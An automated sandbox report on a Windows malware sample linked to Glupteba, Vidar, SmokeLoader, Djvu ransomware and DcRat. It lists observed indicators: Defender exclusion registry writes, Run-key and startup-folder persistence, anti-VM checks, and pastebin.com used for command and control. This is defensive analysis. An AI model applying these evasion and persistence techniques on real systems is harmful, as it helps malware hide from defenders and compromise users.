Analysis Overview
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Vidar
Glupteba
Detect Vidar Stealer
Socks5Systemz
SmokeLoader
Detected Djvu ransomware
Windows security bypass
Djvu Ransomware
DcRat
Stops running service(s)
Drops file in Drivers directory
Modifies Windows Firewall
Creates new service(s)
Downloads MZ/PE file
Unexpected DNS network traffic destination
Loads dropped DLL
Drops startup file
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
Windows security modification
Reads data files stored by FTP clients
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver.
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious use of UnmapMainImage
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-10 12:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-10 12:34
Reported
2024-03-10 12:36
Platform
win7-20240221-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
DcRat
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Vidar
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\OfGko1bZzBM1bzFb5LZvvAbE.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FtARml6NECrzLUGLB7hgMhwu.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIOEFc6hWJr0ydchr4qX0pdM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gbRb1W98nJwYQkPShG3885Kw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7k5hHQOMhVXIgk5NOvr2fzWN.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qqm1DwwHC3wYyZ7mEKL5cCWr.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\OfGko1bZzBM1bzFb5LZvvAbE.exe = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\bf75f872-64ea-4beb-9242-0cdc8b441b91\\6F19.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\6F19.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2516 set thread context of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe |
| PID 2484 set thread context of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\6F19.exe | C:\Users\Admin\AppData\Local\Temp\6F19.exe |
| PID 2948 set thread context of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\6F19.exe | C:\Users\Admin\AppData\Local\Temp\6F19.exe |
| PID 2072 set thread context of 2536 | N/A | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240310123451.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\11eb1c8b-3860-4b19-acdb-d91fa147b68d\build2.exe |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\sOTZbo1xnbBjnslt8Zdndn9H.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\Pictures\OfGko1bZzBM1bzFb5LZvvAbE.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
